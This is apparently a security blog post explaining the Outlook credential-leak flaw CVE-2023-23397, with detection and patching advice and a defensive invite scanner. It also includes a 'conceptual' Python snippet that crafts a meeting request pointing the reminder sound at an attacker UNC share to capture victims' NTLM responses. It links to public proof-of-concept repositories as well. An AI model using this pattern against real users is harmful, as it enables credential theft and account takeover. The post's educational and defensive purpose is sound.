In March 2023, Microsoft patched a serious security issue in Microsoft Outlook—CVE-2023-23397. This flaw allowed bad actors to gain higher privileges just by sending a carefully crafted email. In this post, I’ll break down what this vulnerability is, how it works, show some code snippets, and share links to official advisories and practical resources. Let’s get started.
What is CVE-2023-23397?
CVE-2023-23397 is an Elevation of Privilege (EoP) vulnerability in Outlook that doesn’t even require the victim to open the malicious email. If exploited, attackers can capture Outlook users’ NTLM credentials and then relay or crack them to authenticate as those users on other systems—a dangerous attack vector.
How Does It Work?
The exploit uses a technique called NTLM Relay. Attackers send a calendar item whose extended property (PidLidReminderFileParameter, the custom reminder sound) points to a file on a UNC path controlled by the attacker. When Outlook processes the reminder it automatically tries to fetch that remote file over SMB, and in doing so sends the user’s Net-NTLMv2 authentication response (often loosely called the “NTLM hash”), which the attacker can relay to another service or attempt to crack offline.
1. Attacker creates a calendar invite with a UNC path to \\attacker[.]com\share\something.
2. Outlook receives the invite and automatically connects to the attacker’s server *before* the user even clicks or opens it.
3. During the connection attempt, Outlook sends an authentication handshake containing the user’s Net-NTLMv2 response (the “NTLM hash”), which the attacker captures for relay or offline cracking.
Code Snippet: Crafting a Malicious Meeting Request
Here’s how a malicious meeting request might look (conceptual Python, using the exchangelib library):
```python
from exchangelib import Account, Credentials, CalendarItem, EWSDateTime

# Credentials for attacker
creds = Credentials(username="attacker@example.com", password="password")
account = Account('attacker@example.com', credentials=creds, autodiscover=True)

# Malicious UNC path
malicious_path = r'\\attacker-mount\share\payload'

# Inject the path into the "reminder sound" property (PR_REMINDER_SOUND_FILE)
item = CalendarItem(
    folder=account.calendar,
    subject='Important Meeting',
    start=EWSDateTime(2023, 6, 20, 15, 0, 0),
    end=EWSDateTime(2023, 6, 20, 16, 0, 0),
    location='Board Room',
    required_attendees=['victim@example.com'],
)

# Extended Property for the exploit (conceptual: REMINDERSOUND is not a standard
# iCalendar property; see the note below on how the MAPI property is really set)
item.mime_content = f"""
BEGIN:VCALENDAR
BEGIN:VEVENT
SUMMARY:Important Meeting
DTSTART:20230620T150000Z
DTEND:20230620T160000Z
ATTENDEE;CN=Victim:mailto:victim@example.com
REMINDERSOUND:{malicious_path}
END:VEVENT
END:VCALENDAR
""".encode('utf-8')
item.save()
```
Note: In a real-world attack, adversaries would use special tools to set the PidLidReminderFileParameter (custom reminder sound) property to the malicious network path.
Detection
- Review sent/received Outlook calendar invites, tasks and emails for UNC paths, especially in the PidLidReminderFileParameter property (Microsoft published a script alongside its advisory to audit Exchange mailboxes for such items), and alert on outbound SMB (TCP 445) connections from workstations to external hosts.
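The review step above, as an added example that is not part of the original post: a small Python scanner that pulls every UNC path out of an invite’s text and ranks a hit in a reminder-sound property above one in free text such as the description. The sample invite is constructed, the REMINDERSOUND label is borrowed from the snippet above, and the internal-host allowlist is an assumption about which file servers a given environment treats as benign.

```python
import re
from typing import NamedTuple

# UNC path: \\host\share[\rest]. Host ends at the next backslash; share and rest end at whitespace.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9][A-Za-z0-9._-]*)\\([^\\\s<>]+)(?:\\[^\s<>]*)?")

# Property names under which a UNC path makes Outlook fetch the file automatically.
# PidLidReminderFileParameter is the MAPI name; REMINDERSOUND is the label used in the snippet above.
REMINDER_PROPS = {"pidlidreminderfileparameter", "remindersound", "pr_reminder_sound_file"}

class Finding(NamedTuple):
    line_no: int
    prop: str      # property name on that line (iCalendar NAME;PARAMS:value), lower-cased
    host: str      # UNC host the client would authenticate to
    path: str      # full UNC path as written
    severity: str  # "high" for reminder properties, "review" for UNC paths anywhere else

def scan_invite(text: str, internal_hosts: frozenset = frozenset()) -> list:
    """Return every UNC reference in an invite body, ranked by the property it appears in."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        prop = ""
        if ":" in line:
            prop = line.split(":", 1)[0].split(";", 1)[0].strip().lower()
        for m in UNC_RE.finditer(line):
            host = m.group(1).lower()
            if host in internal_hosts:
                continue  # known internal file servers are expected in invites; skip them
            severity = "high" if prop in REMINDER_PROPS else "review"
            findings.append(Finding(n, prop, host, m.group(0), severity))
    return findings

# Constructed sample invite (not a real capture): a harmless UNC to an internal file server
# in the description and a reminder-sound UNC pointing at a documentation-range address.
SAMPLE_INVITE = """BEGIN:VCALENDAR
BEGIN:VEVENT
SUMMARY:Quarterly review
DTSTART:20230620T150000Z
ATTENDEE;CN=Victim:mailto:victim@example.com
DESCRIPTION:Slides at \\\\fileserver01\\shares\\q2\\deck.pptx
REMINDERSOUND:\\\\203.0.113.7\\share\\ping.wav
END:VEVENT
END:VCALENDAR
"""

if __name__ == "__main__":
    for f in scan_invite(SAMPLE_INVITE, frozenset({"fileserver01"})):
        print(f"line {f.line_no} [{f.severity}] {f.prop}: {f.path}")
```

Run against exported .ics text or a MIME body dump; anything ranked "high" whose host is not one of your own file servers is worth treating as an attempted CVE-2023-23397 trigger.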
Protection
- Patch Outlook immediately (see the Microsoft Security Update linked below).
- Use strong, unique passwords for Windows accounts so that any captured Net-NTLMv2 response is expensive to crack.
- Restrict NTLM usage where possible (see Microsoft’s NTLM hardening guidance) and block outbound SMB (TCP 445) from the internal network to the internet.
Public Exploits
While Microsoft’s patch came quickly, proof-of-concept scripts surfaced within weeks. Some GitHub repos and security blogs have detailed how to replicate the attack for testing (educational use only):
- https://github.com/GTFOBInary/CVE-2023-23397
- https://github.com/embedi/CVE-2023-23397
These scripts can help blue teams test their defenses, but never send such emails to users without explicit permission!
Microsoft Guidance and Patch Information:
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-23397
- https://msrc.microsoft.com/blog/2023/03/outlook-vulnerability/
Technical Deep Dives:
- SANS Internet Storm Center Diary on CVE-2023-23397
- MDSec Blog: Outlook NTLM cred theft Zero-Day
Final Thoughts
CVE-2023-23397 is a reminder that email applications—often overlooked in security—can be weaponized in clever ways. The best defense is patching promptly and restricting unnecessary SMB traffic. Stay safe, and keep Outlook updated!
*Disclaimer: This article is for educational and defensive purposes only. Never attempt to exploit systems without written permission.*
Timeline
Published on: 03/14/2023 17:15:00 UTC
Last modified on: 03/20/2023 14:00:00 UTC